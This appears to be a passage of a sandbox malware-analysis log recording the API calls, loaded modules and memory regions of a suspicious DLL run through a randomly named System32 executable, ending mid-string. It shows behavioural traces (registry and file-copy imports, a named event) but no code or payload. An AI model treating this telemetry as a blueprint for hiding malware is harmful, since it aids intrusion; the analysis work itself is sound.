0x7621ce2e [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.750] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.750] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.750] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.750] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.750] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.750] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.751] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.751] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.751] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.751] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.751] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.751] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.751] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.752] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.753] HeapDestroy (hHeap=0x460000) returned 1 Process: id = "38" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fae0" os_pid = "0xc34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"DefaultInstall\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1722 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1723 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1724 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1725 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1726 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1727 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1728 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1729 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1730 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1731 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1732 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1733 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1734 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1735 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1736 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1737 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1738 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1739 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1740 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1741 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1742 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1743 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1744 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1745 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1746 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1747 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1748 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1749 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1750 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1751 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1752 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1753 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1754 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1755 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1756 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1757 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1758 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1759 start_va = 0x1a0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1760 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1761 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1762 start_va = 0x3e0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Thread: id = 82 os_tid = 0xc38 [0033.789] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf56c | out: lpSystemTimeAsFileTime=0x2cf56c*(dwLowDateTime=0xe1d46ab0, dwHighDateTime=0x1d3dfba)) [0033.789] GetCurrentProcessId () returned 0xc34 [0033.789] GetCurrentThreadId () returned 0xc38 [0033.789] GetTickCount () returned 0x17953 [0033.789] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf564 | out: lpPerformanceCount=0x2cf564*=368566428) returned 1 [0033.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.790] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.790] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.790] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.790] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.790] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.791] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.791] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.791] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.791] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.791] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.791] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.792] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.792] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.792] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.792] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.792] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.792] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.792] GetCurrentThreadId () returned 0xc38 [0033.792] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"DefaultInstall\"" [0033.792] GetEnvironmentStringsW () returned 0x467980* [0033.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1c09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.792] FreeEnvironmentStringsW (penv=0x467980) returned 1 [0033.792] GetStartupInfoA (in: lpStartupInfo=0x2cf4bc | out: lpStartupInfo=0x2cf4bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.793] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.793] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.793] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.793] SetHandleCount (uNumber=0x20) returned 0x20 [0033.793] GetLastError () returned 0x0 [0033.793] SetLastError (dwErrCode=0x0) [0033.793] GetLastError () returned 0x0 [0033.793] SetLastError (dwErrCode=0x0) [0033.793] GetLastError () returned 0x0 [0033.793] SetLastError (dwErrCode=0x0) [0033.793] GetACP () returned 0x4e4 [0033.793] GetLastError () returned 0x0 [0033.793] SetLastError (dwErrCode=0x0) [0033.793] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.793] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cf49c | out: lpCPInfo=0x2cf49c) returned 1 [0033.793] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cef68 | out: lpCPInfo=0x2cef68) returned 1 [0033.793] GetLastError () returned 0x0 [0033.793] SetLastError (dwErrCode=0x0) [0033.793] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ceef8 | out: lpCharType=0x2ceef8) returned 1 [0033.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf37c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf37c, cbMultiByte=256, lpWideCharStr=0x2cece8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0033.793] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x2cef7c | out: lpCharType=0x2cef7c) returned 1 [0033.793] GetLastError () returned 0x0 [0033.793] SetLastError (dwErrCode=0x0) [0033.793] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf37c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf37c, cbMultiByte=256, lpWideCharStr=0x2cecb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.793] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.793] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2ceaa8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.793] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2cf27c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÉ\x80Èô´ô,", lpUsedDefaultChar=0x0) returned 256 [0033.793] GetLastError () returned 0x0 [0033.793] SetLastError (dwErrCode=0x0) [0033.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf37c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf37c, cbMultiByte=256, lpWideCharStr=0x2cecd8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.794] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 